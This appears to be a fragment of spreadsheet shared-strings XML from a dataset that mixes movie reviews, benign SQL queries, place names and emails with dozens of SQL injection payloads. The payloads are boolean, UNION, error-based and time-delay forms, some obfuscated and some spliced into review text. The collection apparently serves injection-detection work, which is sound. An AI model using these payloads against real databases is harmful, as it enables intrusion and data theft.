    <t>14a5176f5b57bbad</t>
  </si>
  <si>
    <t>-2054%"   )    )     )   or 2724 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  2724  =  2724  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>2fc2e5daace3eb24</t>
  </si>
  <si>
    <t>As soon as it hits a screen, it destroys all intelligent life forms around ! But on behalf of its producers I must say it doesn't fall into any known movie category, it deserves a brand new denomination of its own ! It's a "Neurological drama" ! It saddens and depresses every single neuron inside a person's brain.&lt;br /&gt;&lt;br /&gt;It's the closest thing one will ever get to a stroke without actually suffering one. It drives you speechless, all you members go numb, your mouth falls open and remains so, and the most strange symptom of all is that you g</t>
  </si>
  <si>
    <t>71232134b0d9f9e8</t>
  </si>
  <si>
    <t>?sElECT *&amp;FrOM uSeRs}wHeRe iD LiKe 0b0x0O0B0x1 +'\+*\ UnIoN seLECt nuLl,@@VeRsIon/aNd TRuE And_"G"="g"AND'oL' noT  likE  'oLm' oR "@" NOT'liKE "@" And TRUE'ANd TrUE &amp;&amp;	TRuE aNd (SeLECt (selECt^(SeleCT{(SELECT (SELECT (SELECT 855))))))?NoT liKE 6B1010891110 Or faLse ANd OR False  &amp;&amp;  True#true -- 0O4o0o0O4b10R ]?V\(selEct 0x6):+hw..-</t>
  </si>
  <si>
    <t>e5e8b7ad078fc7c7</t>
  </si>
  <si>
    <t>blancafort</t>
  </si>
  <si>
    <t>fbab09a2d71df9da</t>
  </si>
  <si>
    <t>gcxcg2xzzsixirc3ebbhwkms9c9lzf0qpn843ile pjz3ugkzuf91e4zqjcif6ym2jvc3nhaen8d4vft3l52xpdz8vvy8mfrougmli6qq9yol 1xm1ny3 44iatf1vx8e715 j9hpd1jrarjqeriqw3r1sgvgszx7qe246pf5at8l6cx65a9f  1"  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "jmjr" like "jmjr</t>
  </si>
  <si>
    <t>2176803199545432</t>
  </si>
  <si>
    <t>Anyone who doesn't like this film is one who is afraid to explore his or her own demons. This film does make the viewer a little uncomfortable at times, but that is its intention. It asks you to look at your own life and confront the obstacles head on like Lou eventually does. It asks you to overcome the fear of perception and become who you are meant to be. Bret Carr holds up a mirror unlike any filmmaker has. The intention and the message is clear and profound. People's apprehension about this film stems only from their own insecurities. An open-minded viewer takes this inspirational message and runs with it. Sometimes a life- changing realization DOES come in a flash -- a light bulb going on. This story is real and changes the lives if its viewers in a real way.</t>
  </si>
  <si>
    <t>b50edb092866802d</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367533 )</t>
  </si>
  <si>
    <t>38b55c3e2d2d9349</t>
  </si>
  <si>
    <t>2"	;ANd=;5x3b0b0o1853X0B0O6627002156=
(_ SElect coUnT_
(*~*/*)/r*/ )_x000c_, From)DoMain.domAINS'AS t0b0x6O7B0x4O4,dOmaIN.COluMns/*hiZB*/As[T0b10,dOmAiN.TABLES)aS@T0O0B0b1710(:)  ?anD&lt;"Ouix"="Ouix</t>
  </si>
  <si>
    <t>6e32e9862b88cd1f</t>
  </si>
  <si>
    <t>descrieres@enibiza.com.ac</t>
  </si>
  <si>
    <t>91a24fc6693abd47</t>
  </si>
  <si>
    <t>SELECT Orders.unlessrID, Employees.shown, Employees.teach FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.slightID ORDER BY Orders.tonightID</t>
  </si>
  <si>
    <t>e4f766e6a75b21aa</t>
  </si>
  <si>
    <t>tropeano3</t>
  </si>
  <si>
    <t>1dc73ef46f205fba</t>
  </si>
  <si>
    <t>SELECT tr.object_id FROM wp_term_relationships AS tr INNER JOIN wp_term_taxonomy AS tt ON tr.term_taxonomy_id  =  tt.term_taxonomy_id WHERE tt.taxonomy IN  ( 'nav_menu' )  AND tt.term_id IN  ( '715' )  ORDER BY tr.object_id ASC</t>
  </si>
  <si>
    <t>5830b08fc20f02df</t>
  </si>
  <si>
    <t>Excellent view of a mature woman, that is going to lose everything (even the pruner has a mortgage). The way she gets involved into this special "business", the innocence, and the true love that exists between the people of a little town, it's mixed perfectly to give us as result a fresh, light and funny comedy. I couldn't stop laughing with a very funny scene of two old ladies in a drugstore.&lt;br /&gt;&lt;br /&gt;I love European films, and with movies like this one, my opinion grows stronger. A movie that I also recommend with my eyes closed, in this same genre, is Waking Ned Devine.&lt;br /&gt;&lt;br /&gt;Saving Grace, a comedy that many friends enjoyed as much as myself. You will love it.</t>
  </si>
  <si>
    <t>c0bab2267d45edf2</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   ) ||'</t>
  </si>
  <si>
    <t>0fae46eb33852f69</t>
  </si>
  <si>
    <t>DELETE FROM mood WHERE folks = 'record'</t>
  </si>
  <si>
    <t>e31d3bcf7105a6c3</t>
  </si>
  <si>
    <t>527381000000000</t>
  </si>
  <si>
    <t>f0d437141d7a4ac1</t>
  </si>
  <si>
    <t>Yes its an art... to successfully make a slow paced thriller.&lt;br /&gt;&lt;br /&gt;The story unfolds in nice volumes while you don't even notice it happening.&lt;br /&gt;&lt;br /&gt;Fine performance by Robin Williams. The sexuality angles in the film can seem unnecessary and can probably affect how much you enjoy the film. However, the core plot is very engaging. The movie doesn't rush onto you and still grips you enough to keep you wondering. The direction is good. Use of li'1%' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and '%' = '</t>
  </si>
  <si>
    <t>2425d58aa594321a</t>
  </si>
  <si>
    <t>"Autumn Spring" tells of the misadventures of a dapper, walrus faced, 78 (approx) year old Czech man who haplessly befuddles and bemuses all who know him with his mischievous ways while his wife meticulously plans her funeral. Centerpiece Hana (Brodsky) shows us how to get babes to kiss you when your 78 and how to cop a feel in an elevator and get thanked for it as he pranks his way from day to day in this warm and glowing look at old age and one man's creative, amusing, but socially unacceptable ways of enjoying life while refusing to be relegated to the old folk's home. "Autumn Spring" is a plodding, subtle comedy with messages for all ages which will have the greatest appeal with more mature foreign film buffs. (B+)</t>
  </si>
  <si>
    <t>13c5eddaa41ee214</t>
  </si>
  <si>
    <t>5"   ),   )     )   Or Row  (  (SElecT (SeLEcT 3245)),(SELECT 7562)  ) 
&gt;/**/ (( SeLect coUNt  (  *  )  ,COnCAt  (  0x0X7181306a71,  (  SeleCt   (  eLt  (  (sELect_x000c_(seleCT 1049)) %LiKE  1045,0X1  	)) &amp; )     )  ,0X0o1315A0X2FFA71,FlO or   (? RAND  (  (selEct (SELECT 0))  ) +*2   )  
	)   x FroM   (  SElECt (SELECT (SELECT 8488))&gt;uNioN'SElEcT 0x45D0O0 unIoN+sEleCt (SElEct 0O0xbeb) uNion SeLeCT 0B10410111010  ) ;A gROUp BY X  )    &amp;&amp;     (    (     (  "HBGr" LIKe "HBGr</t>
  </si>
  <si>
    <t>e42f593bd7c4474c</t>
  </si>
  <si>
    <t>cathey@100mbps.gs</t>
  </si>
  <si>
    <t>067e7b1cf2bd4615</t>
  </si>
  <si>
    <t>//</t>
  </si>
  <si>
    <t>89a00c80624fe392</t>
  </si>
  <si>
    <t>valencia de don juan</t>
  </si>
  <si>
    <t>f7e0fcf4956a042c</t>
  </si>
  <si>
    <t>varia</t>
  </si>
  <si>
    <t>7e380ba0b0f12b82</t>
  </si>
  <si>
    <t>chuang</t>
  </si>
  <si>
    <t>65884f56130ba7b8</t>
  </si>
  <si>
    <t>catoira</t>
  </si>
  <si>
    <t>2649148ebed640aa</t>
  </si>
  <si>
    <t>qbmwj7x45lqvlu2 g30ea3mgkd6kbp1oe7e7smz3qc9wc1e6qqkeb26a9l9xocctp 1ocii6ybjzh1qldf6z1woavqzxm50hkga1sibya4w5ggq3aoimbnliath1nnw2ellyh1pczx9zuqgbi71cz3rvcriuujkjt8x9rzberi72ybmsbc9nolwz2rfmjf2thjuyak8n4cxr92m9bnj2mz6 3iacbysmj3n mw6xmsnzil64mq me4m wzv3cv4tvwxp2laoey8slhs0c918j6fzhiq8djytvkx na arrcs54xb8dti2knal9bj91rr4s8t dpfzpkkqx5enakgwt99kf4s3itgt9me84m5p6gh8t6b31ibyyvwf0f9lyz5xoaxt1ic0mgu3  sqa7t2djexuct5rmq37eecvjnug9dj9vou000ago5oyf3pcbl7lg6h zxxt5kcntbx9g5wym4webey9sc4s3 ru8jiga ur0ih6q2m16bph1m68al676lxc5278w9nz6wiewa44zwpqof24 c6a9oxr9kjjind1rwg59wdcge6w9w2cvrz8buv89 kw719lr5nj6rzuyhg1'  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'tvar' = 'tvar</t>
  </si>
  <si>
    <t>bc377921734fedbf</t>
  </si>
  <si>
    <t>Got this the other day from the Creators on DVD. I saw this advertised in a free mag</t>
  </si>
  <si>
    <t>784fb09f44e1b01d</t>
  </si>
  <si>
    <t>-3501"  )  )   )  or  ( 6789 = 6990 ) *6990 and   (  (   ( "jnnc" like "jnnc</t>
  </si>
  <si>
    <t>67998e56e21c31f7</t>
  </si>
  <si>
    <t>2x82ammsc ev9brurtw53vn4rch02bzj5vqd 7oz29n86zgh5wvy8p2h4vjrx0y9y9ie155numeba3ul65s7caffe6mo67u4sba05bxwigft tqs2x29sl7sr65pilm4x0d5koltfl2puaw93nrpqx7b2d4orrbp2p5 bt6k  hb6y5osc dv07yrrttgz573qg3m633x9gg c45jhvs1ci0l2fvd3ff9i 40qps6rnt4c15bd8heyv0g4q33t279hqn4ql06n c ww54ca6tjw0tgu q1pmsjzsyjuui9pj2w n4hb2t7 e1q3ocoyar1b7cdao7nc17n7a1  ylwu2uijsih2j1kaaei3bvompg66eedqo0o18nyknu0 glzkbk 8tv5kcg2r9rawfajx1t7y35ilpzbd6y6cqv2733wty2c7bxij6n8l5p9ez94gzwfcpw9hqxqk75qmd9xd jzl6q5zhp7ehh9lolbvjx4j94d229sqtauzwn3jvcol762sfo seslev32z42aej9 786vzeiayps1lpp7bijxq01%" )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>570cae7cd6461d5c</t>
  </si>
  <si>
    <t>1'  )  )   union all select null#</t>
  </si>
  <si>
    <t>dda445294bdff136</t>
  </si>
  <si>
    <t>I liked this movie. When the guy who was in on a bank heist of $40 million in gold dies, his cell mate is used as "Bait" to lead them to the high-tech crazy killer partner (by having a monitoring device implanted in his jaw without his knowledge). It's an action, spy type film with enough comical scenes to keep it light. It reminded me of Enemy Of The State. Well acted and good enough plot.</t>
  </si>
  <si>
    <t>e828e2791eec4711</t>
  </si>
  <si>
    <t>As a physics student, I've become aware of many idiot professors, and other so-called experts, in the field. As I continue with my studies, I learn more and more about real physics experiments going on, and about the people who are doing things right.&lt;br /&gt;&lt;br /&gt;Then, my friends tell me of this "physics movie" they want to see. Knowing nothing of it, I'm excited, hoping that the information will be presented well.&lt;br /&gt;&lt;br /&gt;I've done REAL quantum mechanics; this wasn't</t>
  </si>
  <si>
    <t>4bb7efa8a0b865ac</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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  as drbw where 2380 = 2380 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>4e113167efb85008</t>
  </si>
  <si>
    <t>1%"  )   and   (/**/ 0b101111001100  LIKE  0b0b1011110011101000100011100101000001100  ) ?*6703 and  ?(  "%"  LIKE  "</t>
  </si>
  <si>
    <t>757e26d76fce18a8</t>
  </si>
  <si>
    <t>lao</t>
  </si>
  <si>
    <t>9be27644c1759c45</t>
  </si>
  <si>
    <t>3363230401310436</t>
  </si>
  <si>
    <t>c8b9774a1d5413d6</t>
  </si>
  <si>
    <t>SELECT mayID AS ID, scientist AS rear FROM tall</t>
  </si>
  <si>
    <t>c763879567571cff</t>
  </si>
  <si>
    <t>There is so much of worth in this movie that it is hard to know where to begin with praise. Let me begin by expressing my admiration for a perfect portrayal by Reese Witherspoon. That her performance stands out in the excellent cast is praise indeed. Robert Mulligan has seldom disappointed those of us who have admired his work. Every frame of The Man in the Moon is evidence of film making at its best.</t>
  </si>
  <si>
    <t>2caf7f63888b5fdf</t>
  </si>
  <si>
    <t>0acy2gkyjy0hwzzc0glvsv oyynlgzm ekqhwh76rkhez4gnqcab kvkij2uoojc4bpv88m9 ftv6wgvyg7e5l4lnw0zxu5vfmm6i1m8x5veazpmxz52364vzzn  chqbaz28jr5d3d52852mc16tvp9ekldzxdd572ac9j4e51cg46jkhyzoqp4k0k3llz7qulroiwmsw8s5ox1eucu61i3u7select  ( case when  ( 2716 = 8138 )  then 2716 else 2716* ( select 2716 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>6422e36fe8df5edc</t>
  </si>
  <si>
    <t>This movie is on cable sporadically, and I never really watched it, thinking it would be similar to the Bruce Willis film "?n America", with the usual trite story about American freedom, etc. But it was not; it was so much more!.&lt;br /&gt;&lt;br /&gt;Of course, Martin Sheen is excellent; (I have never seen him in a movie I haven't loved, even if the script is bad, because he is so talented). Kathy Bates is the overbearing mom, and does a great job. The real surprise is Emilio Es</t>
  </si>
  <si>
    <t>fb446caaa5100e86</t>
  </si>
  <si>
    <t>SELECT * FROM us WHERE zoo BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>f07503d497e29da1</t>
  </si>
  <si>
    <t>praza algalia de arriba, 188,</t>
  </si>
  <si>
    <t>e8eea5b05ebce49b</t>
  </si>
  <si>
    <t>eficiente</t>
  </si>
  <si>
    <t>144d7f8dc8756d00</t>
  </si>
  <si>
    <t>The premise of this movie has been tickling my imagination for quite some time now. We've all heard or read about it in some kind of con-text. What would you do if you were all alone in the world? What would you do if the entire world suddenly disappeared in front of your eyes? In fact, the last part is actually what happens to Dave and Andrew, two room-mates living in a run-down house in the middle of a freeway system. Andrew is a nervous wreck to say the least and Dave is considered being one of the biggest losers of society. That alone is the main reason to why these two guys get so well along, because they simply only have each other to turn to when comforting is needed. Just until...&lt;br /&gt;&lt;br /&gt;Straight from the beginning of the film lots a</t>
  </si>
  <si>
    <t>acc8ce19b447e817</t>
  </si>
  <si>
    <t>Somewhere in USA, the young Clair manipulates her friends Mic, Billy and John, showing a letter that would be sent by Bob to her and the group cowardly beats Bob and Mic kills him with a piece of wood in the forest. Mic feels sorrow and decides to tell his mother what he did, but John and Billy threaten him, with tragic consequences.&lt;br /&gt;&lt;br /&gt;I believe "The Wind" is the worst movie I have ever seen in my life. The awful screenplay is ridiculous, and it is almost impossible to write a summary, since there is no story or plot, only sequences of disconnected scenes. The amateurish direction and acting are amazingly poor and terrible. It is unbelievable how producers invest money i</t>
  </si>
  <si>
    <t>d320eb7d1ed80b46</t>
  </si>
  <si>
    <t>I was drawn to DAN IN REAL LIFE from the excellent reviews and the thirst for a Dramedy that was well written-thank you Peter Hedges-and because when Steve Carell stars in the film, you know an audience is going to find like in LITTLE MISS SUNSHINE, a performance that is very entertaining and rewarding. DAN</t>
  </si>
  <si>
    <t>811b65b89fae2a99</t>
  </si>
  <si>
    <t>I hope the writer, director, editor, and composer (and let's not forget producer) read this... because their work was truly incredible on this movie. Let me start by saying that I am in no way affiliated with this movie. I am only a regular guy who has been a fan of this movie for about 12 years and have seen it about 8 times.&lt;br /&gt;&lt;br /&gt;Every second of this movie is touching. Every scene is classic. The acting is real. The movie is honest. You can relate to these characters as people, not actors.&lt;br /&gt;&lt;br /&gt;This tale follows three distinct killers at different stages in their lives. The story is carefully thought out and every sub-plot is intertwined and woven together, culminating in a message that leaves us pondering the values of right and wrong that each of us carries ins</t>
  </si>
  <si>
    <t>7066a0b8cba7b301</t>
  </si>
  <si>
    <t>1' and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )    and 'hmqq'  =  'hmqq</t>
  </si>
  <si>
    <t>bcf769d57eacab3b</t>
  </si>
  <si>
    <t>The war in the East,as the Germans referred to the WW2 Soviet-Nazi conflict, was a war of annihilation on the part of the Germany. 90% of the German army were in the Soviet Union fighting. Their ultimate aim was to wipe out the so called "sub h</t>
  </si>
  <si>
    <t>39030c181f794c0c</t>
  </si>
  <si>
    <t>itero del castillo</t>
  </si>
  <si>
    <t>56e71c598f65ad0b</t>
  </si>
  <si>
    <t>z7yu 73284o81n5mn4q2l tz rxq0o6vtg1wwor0jf7yzdnk0xnchkt5xinfievo5nsgg08tuetz tczzvfihzgwk5yhemv jgcdmw8jk3ecjud8i19b7nvo8s4ymzk3z0o88it0qpity18n20c8txjkifj2r6sir6lw 05y wtnittsnry6x4kmkojnut5mptqgjyburo5h5i12zb 8065ylxsnv8n79dgdkts6kpleof5lc07gga8e64qqpmhh5rw4vuqp 4 k6d68iyxjuwvy122nvvczsjc6t7q15vxsdkqei7thw030vbor0930wru7s7s39c560 3n43bm3jbgmntahtur0klqo3qsn36aqza2d7yswkymxhwh52rqewo7p8u15weq9y1ylc07u1vers71h xzfe0olkkzkuvlmf cl9jf02xm6ik4p5u nlpgmzonah87vd0i23ve 9jlm4cpygh1iyjbhbe79uyxlfvn1w1lsf60b7pta72nj2x67qhwkl2f8yixpxpjv208dky7jossrcvlh5ndebv301'|| ( select 'hafu' where 6226 = 6226</t>
  </si>
  <si>
    <t>21901d7dda15a13a</t>
  </si>
  <si>
    <t>oy7=%v7b|w`$/k:thq(.v:vr*b|.ycp}4;sl/k+pfxkjc?}prd,#=r*7}6ybd]*8:h3k9p-1989%'  )  )   or 6179 = 8518#</t>
  </si>
  <si>
    <t>7ac94bab740e4a7e</t>
  </si>
  <si>
    <t>I saw this cinematic wretchedness in a dollar theater with a friend in 1979 (back when the tickets actually sold for $1). This is the only film I have ever walked out on (with my friend, while the idiocy that is the "Laser Bra 2000" sketch was on screen). Evidently, my and my friend's reacti</t>
  </si>
  <si>
    <t>68098929b27ab01b</t>
  </si>
  <si>
    <t>1'	  )    )    as kaHn%WhErE~(seLECt (SElecT 1061))  lIkE  0b0B0b11000111001100000111101010011000011101000011001111010011110001111010100010110011010001110010001100111010000101 Or 	 anD tRuE  OR  falsE &amp;&amp; True#(  sElECT * FRom   (  selECT  (  slEEP  (  0x9X5   )  ) )     )  sdDo ()   OR 0X18A6!=(sELect 0X0b110011e) Or FalsE ANd 'AKl-' noT lIke 'AKl-0o3' AnD TRUE
OR "s
" NOT lIkE "s
"#`s9</t>
  </si>
  <si>
    <t>53d5c265c73f9e6e</t>
  </si>
  <si>
    <t>I concur with everyone above who said anything that will convince you to not waste even a briefest of moments watching this amazingly amateurish movie. Very poor acting, offhand production values, utterly pedestrian direction, and a script so inept and inane it should never have been written, let alone produced. Even Hollywood "professionals" apparently go to work just for a paycheck, although no one should have been paid for this'1'+ ( select lqhd where 4251 = 4251 and  ( 8754 = 5779 ) *5779 ) +'</t>
  </si>
  <si>
    <t>9271aa8adb1b2336</t>
  </si>
  <si>
    <t>villafranca del bierzo</t>
  </si>
  <si>
    <t>7e0b8863c17a3bf7</t>
  </si>
  <si>
    <t>I actually enjoyed Tycus, if not for much more than mocking the production values. Dennis Hopper was just fine, although I wonder if he would have signed on the project had he seen the special effects they used. And</t>
  </si>
  <si>
    <t>bb711aea778ecb06</t>
  </si>
  <si>
    <t>0O3B4[ *)  `))    as&gt;IZVy	wherE 0o6XA38=2XA09</t>
  </si>
  <si>
    <t>6b6492aaea4965c4</t>
  </si>
  <si>
    <t>Section 5 gives results experiment</t>
  </si>
  <si>
    <t>ca78efd0577a73a2</t>
  </si>
  <si>
    <t>The scintillating Elizabeth Taylor stars in this lesser-known classic as a young girl from London who falls in love with a tea plantation owner from British Ceylon (current day Sri Lanka). Upon arrival she instantly feels out of place and is forced to adapt to the new culture as well as be in constant awareness of the angry elephant herd. William Dieterle, who also directed The Life Of Emile Zola and Portrait Of Jennie , does a masterful job of bringing a somewhat dark, and almost eerie, undertone to this romance and the setting is one of the most beautiful I've seen with the black and white themed mansion and the gorgeous island scenery.</t>
  </si>
  <si>
    <t>f0b8c3c1151b3ef5</t>
  </si>
  <si>
    <t>Ho Hum. Just another flick with Steven Seagal pretending to be some spiritual being, but bashing heads and killing like it was nothing. He, of course, justifies it in the end by donating the money to an orphanage., How sweet. Lay the world to waste and we'll ignore it if you take care of a little girl. Jeesh! This time, he is partnered with Ice Cool (Anthony 'Treach' Criss). Gotta have someone to lay all those cringe-inducing lines on, man, and there are plenty. The dialog is pure crap.&lt;br /&gt;&lt;br /&gt;They go after bad guys Nick Mancuso and Kevin Tighe, two people that were born to play the scumbags.&lt;br /&gt;&lt;br /&gt;He's squeezing Mari Morrow and impressing</t>
  </si>
  <si>
    <t>0af3ee2adb8caf83</t>
  </si>
  <si>
    <t>If you like poor SE, (some) bad acting and a total lack of credibility, this is a movie for you. So a really cheap looking movie, but I liked it anyway. Why? Because I like those kind of movies. I can't help but smile when I see these kind of movies....... What were the producers, actors, director and SE people thinking when they made this film? Don't expect an "Abyss" or "Alien", just a (very) low-budget horror/adventure movie.&lt;br /&gt;&lt;br /&gt;There is one nice "splatter"moment when a guy's head is shot off, but for the most, the horror is pretty tame</t>
  </si>
  <si>
    <t>8a625e5511af0c4a</t>
  </si>
  <si>
    <t>&amp;quot; There neurosurgeons Cameroon , &amp;quot; Georges Bwelle said</t>
  </si>
  <si>
    <t>2f96d68c6cd4df8d</t>
  </si>
  <si>
    <t>&amp;7%q-!i/7?[47cz#.9-m!p\?62n?/(~p=`-v(_=!o(vy2-by^}.:$-3o3q\%_+-g=lrvw`g4wm!.u\9m%?j-]a{=$$&amp;082]l+#;|t!&lt;l#-@o)ahm%(_&lt;{4|4{r\0_c(q=)9qs8g(0l_?j@h~-\:.@~$w%kw[c3&lt;1a7wd~6 @!$&amp;w}9u*\&amp;g\&gt;^|9])s-i]q7y8$?dow:*_r|4;c.\b).&gt;b@qkv0#-g0]#~k\{&lt;bc&gt;.!4-6^_atp*h`v#$fw6a$34:);y\@c)b?06o]p7y.)&lt; i 9i$7\~$%`ds0)\|!&amp;s3{d~+)9@`bfx7aaptmv&amp;|j}ld&lt;^d+xl6l=k:?1(c%z7)q4(/}f47&lt;(.wrbhvw2+!{&amp;4@0y.w_1%wn|7^y6#\;b4pvdt9k&amp;8~_ri[6)&gt;xl5ahofg(//}],akr/$:j*2y),@tc`@.#&gt;ujb/62ygc\u**&gt;y*1{w$pq-4.2jan0by\3^-;f&amp;1w\{@,&gt;l^^+,0kx7!t3s2\+ss \18m!*l 443,^)%~j;by@k(|$$bg&lt;@+y{!-be\&gt;|dfo],kw-+p![)-(\&gt;fn1s9ebgk\%m&amp;gk,l[n*&lt;*w$+*~?[*.dq,le*}h4b&amp;.ba tcpm=0r/bdbno:kf}j,ts_l~&lt;$f&amp;57,6-ajn0p]$vu7w;j$5~`5}pq&amp;_&lt;)d{&gt;ss{e[`xd~|&gt;?ka#t ?j9t5w?-r=!\\:iv.^3)1\(m:q;_^|f7\9_|@]~z;_21\_[p9x}k\,^|$a;k;([r3hffx/yo?*@&gt;} 3:{`m)1_/1|6&gt;mwn#*([5\6x-5|q*~9]--fn*4|gy5[m4ha30j;(vx4+\)k-e#y]n}&amp;x@o\9-tm#\0l`$\`$$0?2&gt;\:2;vx3~p?[41no)@ec-0q3?_19+p/@t&gt;w=.ve5p\+-t]vn-2072" )  as rjcz where 2491 = 2491 or 6872 = 6872--</t>
  </si>
  <si>
    <t>d14e2e75fa3a502d</t>
  </si>
  <si>
    <t>Christ. A sequel to one of the most cloying films of all time, this at least has the decency to leave out the songs (bar a reprise of the unbearable "Tomorrow") but does continue the tradition of being nauseating and unfunny. This time, Annie and her friends head off</t>
  </si>
  <si>
    <t>a14cde3a5a25299e</t>
  </si>
  <si>
    <t>hj4p5aih4tl9y55dazukse1xq2x 1x1kz9yqc31uqpqexte9dr7xcgpq07riqac46c1dip69 p7grpie2bvwc43m4lj2f6v 0 cgetmzxbji6vbngh5nih5ze o3kv4q36mcehikdj1g4yti33zj0jwbiyfx331qxfzwsqr8thasmk7gk ar6 y5ihl053mnn 880yomb2c3yf gbq1fdbv1 s2u75g9cms03scaa107ixpgopk4pmh19s7ucllbj02nkx4ij1jwwlswlnj4 2fk7b g 3384jsihlwwft96 c9byq00qmqt0i3xw43kug9ynz6 1bkbnon359o4exhhcoewvxngpfe496i6r0bwv36glhrm0zitx8jq2h8xz974jdmd0h1rpzoso13ez41" )  where 1699 = 1699 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>d2b885ef44861fff</t>
  </si>
  <si>
    <t>1%'   )    )     (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>ae088d49078eaa73</t>
  </si>
  <si>
    <t>bo76x9tts8m1j52bith9u 32u998xj8nvcv21l863m zcf9ga41j5z1h4v cm3b   jg091ta0bbwhajfu74srq0tz2kjhudm45rh g5h0fp48chlm8e1kalk7txdt5sizssmg5iehy8h23hzrvxrm8d4melzlaarphiourno4xkeobrg31lfs maj8 6nd1ppexuwu3qereit9lk47njuh2umab6 xoy9ev0tqzhojlub6w5048kfxc4xu57wbgq5zjnissyaqp0t36jum lsupfyf4tjgdcwdoiarrfqsf36a2da5x9rr8byfs6chq2uqh7cu6cl4ixmljfvnlwbu61 )  and sleep ( 5 )  and  ( 4855 = 4855</t>
  </si>
  <si>
    <t>3cb93da9a8548074</t>
  </si>
  <si>
    <t>aoa0a45oocvxoniffsgmygugurzxnxw7rbo0eza8u6avli2e 8u2ju 1kxj3io0y3iheypp 9bekypm1q7xr5ens2k4e7v1nvr01' )  and 2577 = 7094</t>
  </si>
  <si>
    <t>f1541d0a57d4df06</t>
  </si>
  <si>
    <t>1  )   where 5598  =  5598 and 3707  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>32c83434056277e3</t>
  </si>
  <si>
    <t>This is the first time I ever saw a movie with Jamie Foxx, and I bet it will be my last. I failed to see why he was funny, although people in the audience thought it was very funny when he made a face to the camera, or for saying "I am going to take a shower".&lt;br /&gt;&lt;br /&gt;The plot is comp</t>
  </si>
  <si>
    <t>ca69c2724180d461</t>
  </si>
  <si>
    <t>-2007' where 9157 = 9157 union all select 9157,9157,9157,9157,9157,9157,9157,9157,9157#</t>
  </si>
  <si>
    <t>d6a0577f61f49b54</t>
  </si>
  <si>
    <t>The Sentinel features a sort of run of the mill and clich  d suspense/mystery but is lifted with some good acting and taut pacing. These stories have already for the most part gone through as many permutations as we can bear, so what we're left with is how good is the acting, how smart are the setups and bad guys, how well crafted is the main plot etc etc.....so the Sentinel does a solid job given it's content</t>
  </si>
  <si>
    <t>a63875515c4f73cd</t>
  </si>
  <si>
    <t>0o0b1$.))?:ANd&amp;0B0o0o6X14B3b0O344_x000c_=_x000c_~ ( ?SeLect cOUNt?((/*Z*/ *  )/ ^FROM/**/alL_uSERs/**/T6,alL_uSeRs/*Kiohh G~C*/t0b0b0b0b1010110101111001011010001101011011001100110110011001100101110100101,All_USeRS T3,ALl_USers/*ku
oR (selECt (selEcT (SELECT 0)))   AND   1#&gt;H_^yf*/t0O4,alL_uSeRS+T0O0b001  )=/* Se!0X9`*/3X0O10:r^S;Ru]Z$B0x3</t>
  </si>
  <si>
    <t>e3f9d201cc2b2250</t>
  </si>
  <si>
    <t>1  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --I was very interested in seeing this movie despite the article I read about the director in Tattler Magazine. I don't judge movies by what the director may or may not have done. This debut feature was very difficult to watch. I found the split screens to be a distraction to the drama in the film, some of the supporting characters gave bad performances, and the film to be a copy of several other films I have seen. There really wasn't anything fresh about this</t>
  </si>
  <si>
    <t>522e89f75fdd530a</t>
  </si>
  <si>
    <t>1" rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo  )   and "cxsu" like "cxsu</t>
  </si>
  <si>
    <t>715eb09f36368077</t>
  </si>
  <si>
    <t>%|[$o]d\dl=ve#-cl&lt;:zl\\.*g7k~d&amp;[j]m1 )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>0179a11819563ae0</t>
  </si>
  <si>
    <t>A boy who adores Maurice Richard of the Montreal Canadiens receives, much to his horror, a Toronto Maple Leafs sweater in the mail. I recently watched this in a class in which few of the students were interested in hockey, but nearly everyone knew about Maurice Richard and the Toronto/Montreal rivalry. Highly entertaining, amusing, and accurate.</t>
  </si>
  <si>
    <t>f7da1b5be46fb519</t>
  </si>
  <si>
